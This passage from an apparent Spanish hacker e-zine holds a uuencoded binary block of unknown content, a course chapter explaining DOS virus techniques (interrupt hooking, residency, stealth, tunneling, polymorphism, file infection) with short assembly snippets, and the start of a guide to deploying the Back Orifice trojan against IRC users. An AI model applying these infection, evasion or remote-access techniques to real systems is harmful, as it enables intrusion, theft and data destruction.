M2(3%LE!)#P4-!U1,[&@K)S:@-[OCBX3Z>WB2;<(H;^JMA7.0,P+C3H5&<>J.
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
8]_FSYO^O^?]K_O_WR___/Q&@"8``L```
`
end
sum -r/size 1846/11634
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CURSO DE ANTIVIRUS
------------------
Primer capitulo: INTRODUCCION
******************************************************************************
Disposicion Legal:
El motivo del presente curso es instruir a aquel que lo siga en el
conocimiento de las tecnicas usadas para combatir virus, empezando por
las mas basicas para acabar en las ultimas novedades. Para ello
profundizare en el conocimiento del codigo virico con el unico
proposito de poner al lector en disposicion de saber a que nos
enfrentamos cuando luchamos contra esta lacra del mundo informatico.
La informacion contenida en el curso es informacion tecnica que puede
utilizarse en la fabricacion de un virus. De ahi que la responsabilidad
unica es del lector, y a su eleccion queda usar bien o mal la informacion
aqui relatada. Del mismo modo es su responsabilidad ejecutar cualquier
codigo aparecido en el curso en su propio ordenador o en el de
terceros, declinando yo toda responsabilidad por los posibles da¤os
causados.
Para evitar en la medida de lo posible el uso fraudulento de esta
informacion no dare en ningun momento el codigo completo de ningun
virus, sino solo rutinas sueltas. De ese modo la confeccion de un
virus a partir de las rutina mostradas en el curso es una labor que
requiere un esfuerzo por parte del lector y por tanto un delito
consciente.
> De ahi que yo, el autor, declino toda responsabilidad civil y/o legal
> que discurra de la utilizacion fraudulenta de esta informacion. El
> responsable unico y ultimo ser el lector si decide usarla para dichos
> fines.
El autor:
Manuel Llorens.
******************************************************************************
He creido conveniente comenzar el curso explicando cada una de las
preguntas de la encuesta, dada la variedad de respuestas que he
recibido. No me extender en aquellas que por su caracter meramente
tecnico pertenezcan mas al curso de ASM de Pablo Barron que al
presente.
Cada uno de los puntos se desarrollar a lo largo del curso alli donde
sea conveniente. Aun no he decidido el 'indice' del mismo, que ya
incluire en el proximo numero (es por esperar a tener el mayor numero
posible de encuestas)
> ¨Sabes para lo que sirve una interrupcion?
Una interrupcion es el modo que tiene un programa ensamblador de
ejecutar servicios y funciones del BIOS (Basic Input Output System,
mas conocido como la ROM) y el DOS.
La mayoria de los virus 'interceptan' estas interrupciones de modo
que cada vez que se ejecuta uno de dichos servicios el virus supervisa
lo que esta haciendo el programa que ejecuto la interrupcion, a este
proceso se le denomina 'instalar un gestor de interrupcion'.
La instruccion ensamblador que ejecuta una interrupcion es
int numero_de_la_interrupcion.
La direccion de cada gestor de interrupcion (vector de interrupcion)
se guarda en una tabla a partir de la direccion 0000:0000, y cada
vector ocupa 4 bytes (seg:off).
> ¨Sabes instalar un gestor de interrupcion?
Pues tan facil como esto:
mov ah,25h (servicio establecer vector de interrupcion)
mov al,interrupcion_a_capturar (entre 0 y 255)
lds dx,gestor_de_interrupcion (direccion de la rutina gestora)
int 21h (llama a la interrupcion del DOS)
Otro metodo que puede usarse si no se quiere llamar al DOS es el
siguiente:
xor ax,ax
mov ds,ax
mov bx,4*interrupcion_a_capturar
mov [bx],offset gestor_de_interrupcion
mov [bx+2],cs (si el gestor esta en el mismo segmento que el actual)
Generalmente es necesario guardar previamente el gestor de
interrupcion actual antes de cambiarlo por el nuestro con el fin de
volver a instalar en antiguo al salir del programa. Tambien
generalmente es necesario que nuestro propio gestor de interrupcion
llame al antiguo. Por ejemplo un virus captura la interrupcion 21h (la
del DOS) si 'detecta' que el programa que la ejecuto est intentando
abrir un fichero (mediante ah=3Dh) lo tratar de infectar y finalmente
dejar que el DOS lo abra, llamando al gestor de interrupcion antiguo.
Igualmente si la funcion que el programa ejecuta no es util a nuestro
virus la dejara pasar al DOS 'intacta'.
> ¨Conoces la forma en la que arranca el DOS?
El proceso difiere ligeramente segun se arranque desde el HD o desde
un disquete, pero basicamente a grandes rasgos es el que sigue:
Primero se ejecuta una rutina que reside en el MBR (ver mas abajo) que
se encarga de cargar el sector BOOT de la particion activa. Si se esta
arrancando desde un disquete el proceso es similar solo que no existe
MBR ni tabla de particion, ya que el sector BOOT siempre esta en la
misma posicion (el primero del disco). Se ejecuta el codigo contenido
en el BOOT. El BOOT carga IO.SYS e MSDOS.SYS a partir de 0070:0000 o
presenta un mensaje de error si el disco no era de arranque. A
continuacion ejecuta IO.SYS (una rutina contenida en el que se denomina
SYSINIT) el cual ejecuta a su vez MSDOS.SYS. Cuando MSDOS.SYS devuelve
el control a SYSINIT este carga el CONFIG.SYS lo procesa y al final
entrega el control a COMMAND.COM para que cargue el autoexec.bat
Este proceso de carga es muy importante dado que si un virus consigue
infectar el MBR o el BOOT toma el control del ordenador antes que
ningun otro programa. A partir de aqui tendremos en cuenta la
siguiente maxima del mundo de los virus:
"Toda porcion de codigo ejecutable es susceptible de ser infectada"
"Toda porcion de codigo no ejecutable puede ser infectada pero nunca
puede dar lugar por si sola a una infeccion" (por ejemplo un mensaje
nunca puede dar lugar a una infeccion, aunque si puede haber sido
infectado por un virus como modo de guardar en el sus datos).
> ¨Sabes lo que es el DTA?
Es el Disk Transfer Address. Basicamente es una zona de memoria que se
crea al ejecutar cada programa y que sirve para que las funciones del
DOS devuelvan informacion al programa a traves de aquellas
interrupciones que no piden explicitamente una direccion de memoria.
Por ejemplo, cuando leemos un fichero en ASM mediante una interrupcion
le pasamos al DOS la direccion de memoria donde queremos que este meta
los datos leidos del fichero, pero cuando le pedimos que nos diga que
ficheros encuentra que coincidan con '*.COM' la respuesta es enviada
al DTA, ya que no le pasamos un direccion.
Por defecto se encuentra a partir del byte 80h del comienzo del
segmento del programa (ver diferencias entre un COM y un EXE) y es la
misma zona que usa el DOS para pasar los parametros de la linea de
comandos a un programa por lo que si vamos a usar la DTA deberemos
relocalizarla primero fuera de dicha zona o perderemos la informacion
sobre dichos parametros. Relocalizarla es tal facil como hacer:
mov ah,1ah
lds dx,direccion_del_nuevo_dta
int 21h
Lo normal es que el virus se cree su propio DTA para no interferir
con los parametros que se le hayan podido pasar al programa infectado
y luego restaura la DTA antes de salir.
> ¨Sabes lo que es un MCB?
Memory Control Block. Es una zona de memoria que se encuentra justo
antes de cada bloque de memoria que reserva el DOS para uso de un
programa que indica cu nta memoria se ha reservado, por que programa y
cual es el siguiente bloque. De este modo un virus puede reservar
memoria para si mismo mediante la modificacion directa de estos MCBs.
> ¨Sabes lo que es el MBR?
Es el Master Boot Record. Esta presente en el sector 0 de cada disco
duro, y contiene ademas de una porcion de codigo ejecutable la tabla de
particion. Puede crearse un MBR nuevo mediante la ejecucion de FDISK
/MBR, en caso de sospecharse que este pueda haber sido infectado.
Algunos discos duros de gran capacidad (>512 megas) instalan en el MBR
su propia rutina para poder enga¤ar al DOS y hacerle creer que son
menores de lo que realmente son, ya que el DOS no puede trabajar con
discos de tama¤os >512 megas, de ahi que debemos ser cuidadosos. En
cualquier caso, la destruccion del codigo ejecutable del MBR no es
demasiado peligrosa, ya que siempre podemos restaurarlo mediante el
FDISK o mediante las utilidades que nos entregaron con el HD, pero si
es m s peligroso destruir la tabla de particiones, ya que si no
recordamos los valores que contiene podriamos perder el acceso al disco
duro.
> ¨Sabes lo que es un CRC?
Ciclyc Redundant Check. Es una forma de comprobar de forma univoca que
el contenido de un archivo no ha cambiado, mediante una operacion
matem tica que afecta a cada byte del archivo y genera un numero (de
generalmente 16 o 32 bytes) para cada archivo. Una vez obtenido este
numero las posibilidades de que una modificacion del archivo de el
mismo numero son peque¤isimas. De ahi que haya sido un metodo
tradicionalmente muy utilizado por los antivirus para comprobar si el
programa habia sido modificado por un virus, guardando para cada
directorio un archivo con los CRCs de cada archivo del mismo y
comprobandolo periodicamente o al ejecutar cada archivo (en caso de un
antivirus residente o uno que modifique directamente el ejecutable para
que se auto chequee cada vez que se ejecute, lo cual ya no se usa porque
daba muchos problemas y falsas alarmas). Otro metodo de comprobar la
integridad de un archivo son los checksums o sumas de control que son
mucho mas sencillas y rapidas pero de menos fiabilidad. De hecho el
metodo de los CRCs es tan potente que muchos antivirus son capaces de
reconstruir el archivo antes de ser modificado a partir de la
informacion de estos. Esta tecnica a dejado de ser segura debido a la
aparicion de virus stealth (invisibles) que son capaces de hacer que
un archivo infectado aparezca a los ojos del programa que calcula el
CRC como estaba antes de infectarlo (ver m s adelante).
> ¨Sabes en que se diferencia un COM de un EXE?
La diferencia principal es que un COM solo puede ocupar un segmento 64
K y un EXE puede ocupar toda la memoria por debajo de 1 mega (sin
contar que el programa este hecho en modo protegido). Pero para
nuestros fines la diferencia principal radica en la forma diferente que
tiene el DOS de cargar y ejecutar estos programas. Veamos como carga el
DOS un COM o un EXE.
Primero se crea un PSP (Program Segment Prefix) que ocupa los 100h
primeros bytes del segmento que ocupa el programa. El programa en si se
carga a partir de 100h. El PSP guarda alguna informacion sobre el
programa que se encuentra justo despus de el. Ademas como vimos
contiene a la DTA y/o a los par metros (por defecto). Si se trata de un
archivo COM el programa comienza a ejecutarse a partir de 100h, si se
trata de un EXE el programa se ejecuta a partir de los datos
especificados en la cabecera del mismos que son los primeros bytes del
archivo ejecutable. No debe confundirse el PSP con la cabecera de un
EXE. La cabecera de un EXE son los primeros bytes del archivo y el PSP
se crea para cualquier programa ejecutable en la memoria (COMs o EXEs).
En realidad existen otros programas ejecutables como son los
controladores de dispositivos (Device Drivers) que se instalan en el
config.sys o los cero code start, que son archivos que se ejecutan
antes de que se haya cargado el dos (IO.SYS y MSDOS.SYS por ejemplo).
En un COM por tanto el primer byte del archivo corresponde con el
primer byte que se ejecutar , en un EXE en cambio los primeros bytes
corresponden a una cabecera que principalmente ofrece informacion sobre
el punto de entrada al archivo, es decir, sobre el byte a partir del
cual se ejecutara dicho ejecutable. Ademas contiene la tabla de
relocalizacion que sirve para cambiar los saltos absolutos (los no
relativos) que contiene el EXE de modo que este pueda ejecutarse
independientemente de la direccion de memoria donde resida (para la
distincion entre saltos absolutos y relativos consultar el curse de ASM
de Pablo ;)
> ¨Sabes hacer un programa residente?
Un programa residente TSR (Terminate and Stay Resident) es un programa
que al terminar su ejecucion no libera la memoria que le habia sido
asignada por el DOS, pero si devuelve el control a este. Sirven
generalmente para instalar rutinas en memoria, en la mayor parte de los
casos gestores de interrupcion. Para dejar un programa residente hay
dos metodos, el primero es mediante la modificacion de los MCBs y el
segundo mediante una llamada al DOS:
mov ah,31h
mov al,error_level
mov dx,tama¤o_de_la_porcion_residente a partir del PSP)
xor dx,4 (para pasar dx a p rrafos)
add dx,16 (para reservar espacio para los 100h bytes del PSP)
int 21h
Para conocer el tama¤o de la porcion residente lo mas conveniente es
poner una etiqueta donde comienza y otra donde acaba y hacer la resta
de ambas.
> ¨Sabes programar un tracer (paso a paso)?
Un tracer es un rutina que pone la CPU en modo
paso a paso es decir,
que cada vez ejecute una instruccion llamara a la int 1h. Existen
diversas tecnicas usadas por los virus y otros programas para evitar
que un tracer explore su codigo (armouring). Para evitar esto ultimo
hay que programar con mucho cuidado de modo que cada vez que se ejecuta
una instruccion miremos a la siguiente para ver si se trata de una
instruccion capciosa aunque es un proceso laborioso y dificil...
en general el procedimiento consiste en instalar un gestor de la
interrupcion 1 y activar el flag de paso a paso:
pushf
pop ax
or ax,100h
push ax
popf
Un tracer es muy util cuando queremos supervisar la ejecucion de un
programa de forma autom tica. Los virus usan esta tcnica para labores
de tunneling (ver m s adelante).
> ¨Sabes usar algun debugger?
Un debugger es como un tracer pero con control en tiempo real por
parte del usuario. Es muy recomendable tener uno a mano para pillar los
bugs que derivan de la programacion de antivirus ;)
> ¨Sabes la diferencia entre un virus y un troyano?
Un virus es una porcion de codigo ejecutable que se a¤ade a otra ya
existente. Los virus se ejecutan sin intencion por parte del usuario,
que no sabe que el programa en cuestion contiene un virus. Un troyano
es un programa con entidad propia que generalmente se construye para
labores destructivas. Es el usuario el que confiando en el programa lo
ejecuta creyendo que se trata de un programa de algun otro tipo.
> ¨Sabes como se produce la infeccion de un archivo?
El virus modifica el programa a infectar de tal modo que se ejecute su
codigo en vez del codigo del programa original. Salvo los virus de
enlace todos los virus necesitan modificar el programa original.
> ¨Sabes lo que es un virus 'stealth'?
Es un virus que mediante algunas tcnicas consigue ocultar su
existencia a los antivirus y en general al DOS. Para ello necesita
estar residente antes que los antivirus. Modifica la informacion que
los antivirus obtiene de modo que parezca que el archivo es normal.
Para ello existen diversos mtodos, ya que son diversos los mtodos que
el DOS usa para manejar archivos. Principalmente son el trabajo fisico
con el disco (a base de leer sectores), los FCBs (mtodo obsoleto), y
la apertura del archivo mediante handles (mtodo vigente).
> ¨Sabes lo que es un 'handle stealth'?
Es un virus que utiliza tcnicas stealth de modo que cada vez que un
programa abre un handle para leer/escribir un archivo, modifica los
datos del handle para que parezca que el programa es normal. Es decir,
aunque el programa sigue estando infectado no es posible ver el
verdadero programa sino solo la copia sin infectar que nos muestra el
virus.
> ¨Sabes lo que es un 'infector/disinfector'?
Es justo la tcnica contraria, cuando el virus advierte que se est
abriendo un programa infectado lo desinfecta y solo vuelva a infectarlo
cuando el archivo es cerrado. Es un mtodo m s sencillo de implementar
que el 'handle stealth'.
> ¨Sabes lo que es un virus con 'tunneling?
Cuando un antivirus queda residente instala sus propios gestores de
interrupcion para interrupciones que puedan serle utiles a un virus. De
ese modo puede dar la alarma cuando un virus efectue una operacion
extra¤a a travs de una de estas interrupciones. Un virus con tunneling
intenta averiguar la direccion de los gestores de interrupcion del DOS
antes de que quedara residente el antivirus. Esto es posible porque
como dijimos con anterioridad, el antivirus tiene que devolver el
control a los gestores del DOS en algun momento para permitir que el
DOS haga su trabajo. Las tcnicas principalmente son dos: hacer un
tracing, o buscar saltos a lo largo del codigo del gestor del antivirus
que salten al DOS. Para ello necesitan conocer el segmento del DOS, lo
cual se hace a travs de una interrupcion indocumentada del DOS. En
realidad son mtodos poco fiables dado que son bastante evidentes y a
veces condenados al fracaso. Muchos antivirus residentes averiguan que
un virus les est haciendo un tunneling y lo detiene. Cuando desarrolle
el tema expondr algunas tcnicas que he descubierto hace poco, que
subsanan la mayoria de los problemas de los tunneling tradicionales.
Aunque hasta la fecha ningun virus las incorpora, es bueno anticiparse
a los fallos del DOS y taparlos antes de que esto ocurra, de ahi mi
inters por esta tcnica ;)
Otras tcnicas se basan en el acceso al disco directamente a travs
de los puertos, es decir sin necesidad de llamar a ninguna
interrupcion. Este mtodo presenta el inconveniente de que no siempre
funciona, por lo que es poco probable que un virus lo incorpore.
> ¨Sabes lo que es un virus polimorfico?
Es un virus que modifica su apariencia en cada infeccion. Esto lo
consigue encript ndose con una clave diferente en cada copia que hace
de si mismo. Esto dificulta mucho las labores de busqueda de cadenas
por parte de los antivirus, que solo pueden fijarse en las rutinas de
desencriptacion o utilizar tcnicas de otro tipo. Para dificultar aun
m s la busqueda de cadenas un virus realmente polimorfico debe variar
tambin la apariencia de su rutina de desencriptacion, mediante la
insercion de NOPs aleatorios (instruccion ASM que no hace nada) y
mediante la utilizacion de distintos registros y loops para realizar la
desencriptacion. Se ha popularizado para este fin la realizacion de
motores de encriptacion que son rutinas que desarrollan estas tcnicas
de un modo general y que se a¤aden a un virus ya completo que no
incluia polimorfismo.
> ¨Sabes lo que es un virus con 'armouring'?
Es un virus que utiliza tcnicas para dificultar ser desensamblado o
traceado. No tienen otro fin que este, pero dado que generalmente
cuesta muy poco realizarlas es bastante popular que un virus las
incluya, aunque tambin pueden dar lugar a que un antivirus heuristico
lo detecte. Ultimamente tambin se han popularizado tcnicas de
armouring que actuan contra un antivirus especifico, evitando las
combinaciones de bytes que se conoce que activan la alarma heuristica o
desactivando el antivirus residente en memoria (mal llamado tunneling).
> ¨Has hecho alguna vez un virus?
Hacer un virus es una cosa divertida, con la cual se aprende mucho,
pero que est penada por la ley. Es mejor combatir esta lacra
estudiando a fondo sus tcnicas y evit ndolas, intentando siempre ir un
paso por delante de los desarrolladores de virus.
> ¨Sabes infectar COMs?
La infeccion de un COM se hace generalmente modificando los primeros
bytes de modo que la ejecucion comience por la rutina virica que se
a¤ade al programa original a partir de su fin (virus appending). Despus
de la ejecucion del virus se restaura en memoria los 3 primeros bytes
del archivo original y se le ejecuta. De este modo el usuario no nota
que el programa est infectado. Otro mtodo cada vez m s en desuso es
el de sobreescribir el codigo original del programa (virus
overwritting). De este modo el programa original no puede ser ejecutado
y el virus se delata con facilidad. Por supuesto puede insertarse el
codigo del virus al principio, pero es una tcnica que no se usa
demasiado.
> ¨Sabes infectar EXEs?
La infeccion de un EXE por el contrario no precisa de la modificacion
del programa original. Se a¤ade el codigo al final y se modifica la
cabecera del EXE de tal modo que el punto de entrada cambie a la rutina
virica, que despus cede el control al punto de entrada original.
Tambin se usan tcnicas como insertar el codigo del virus en el stack
del EXE (zona 'hueca' que puede o no estar presente en el archivo).
> ¨Sabes lo que es un virus de enlace?
Es una modalidad de virus que no precisa modificar el archivo que
infecta. Para ello lo que hace es modificar la FAT de modo que el
comienzo del archivo siempre apunte a un sector que contiene el virus.
Se ejecuta este y carga el programa original. No son muy populares dado
que precisan de un mayor trabajo y no son en general f ciles de
detectar.
> ¨Sabes como funciona una busqueda heuristica?
Ya la he mencionado numerosas veces en el texto. Es una tcnica
antivirus que evita la busqueda de cadenas. Para ello lo que hace es
desensamblar el programa y ejecutarlo paso a paso, a veces mediante la
propia CPU, a veces mediante una emulacion. De ese modo averigua qu
hace exactamente el programa en estudio e informa al usuario.
Generalmente es dificil de implementar de un modo autom tica ya que se
desconoce el conocimiento del usuario. Esto da lugar a un compromiso
entre potencia del mtodo y falsas alarmas. En general es una buena
tcnica si se implementa bien y el usuario tiene un alto conocimiento
tcnico. La mayoria de los virus nuevos evitan directamente la busqueda
heuristica modificando los algoritmos hasta que el programa antivirus
no es capaz de indentificarlos.
Bueno pues esto es todo por hoy. No es que vay is a aprender nada nuevo
pero quedan sentados unos conocimientos b sicos y un lenguaje a
utilizar en el resto del curso. Preguntas... ya sabis las que quer is
;)
Existen muchos puntos que no est n suficientemente detallados, cuando
sea necesario desarrollar cada uno, asi que no me preguntis sobre eso
a raiz de esta introduccion, esperad a que llegue a ese capitulo ;)
Patuel.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Back Orifice
Redactora jefe:
Barbwired
aenimamadrid@geocities.com
Colaboradores:
FREEDOM
Este texto pretende explicar de forma clara y concisa el uso del
BO en w95 y las posibles aplicaciones que se le pueden dar en IRC.
De ningun modo se pretende incitar a la ilegalidad y este documento se
redacta con fines educativos, para la investigacion y prevencion del ataque.
0 - ¨Que es el BO?
Se trata de un troyano que se aprovecha vilmente de los bugs de seguridad
de w95/98. NO tengo constancia de su funcionamiento en NT. Quien consiga
colarle el bo a un incauto, tendra acceso a todo su sistema: Disco duro,
cdrom, disketera, y por supuesto a sus archivos y directorios, pudiendo
borrarlos o modificarlos, bajarlos a su propio disco duro...
(No seamos malos).
1 - ¨Donde conseguir este magnifico exploit?
BO se puede conseguir en las siguientes direcciones:
www.members.xoom.com/lynx/ en la zona de download (descarga).
http://www.cultdeadcow.com/
Para una mayor informacion se recomienda visitar:
www.rootshell.com/
2 - Ya tengo el Bo.zip, ¨Que contiene?
El bo.zip o bo120.zip consta de una serie de archivos:
bo.txt Oscuro documento explicativo. No se entiende mucho.
plugin.txt Traducido en el epigrafe Apendice de este doc.
boserve.exe El servidor autoinstalable del BO
bogui.exe Cliente gui del BO
boclient.exe Cliente en modo texto del BO
boconfig.exe Utilidad de configuracion y plugin del server de BO
melt.exe Descompresor de archivos comprimidos con el comando freeze
freeze.exe Compresor de archivos. SE pueden descomprimir con melt.
3 - ¨Que hacer con todos estos archivos?
Para que todo funcione correctamente debes saber que BAJO NINGUN CONCEPTO
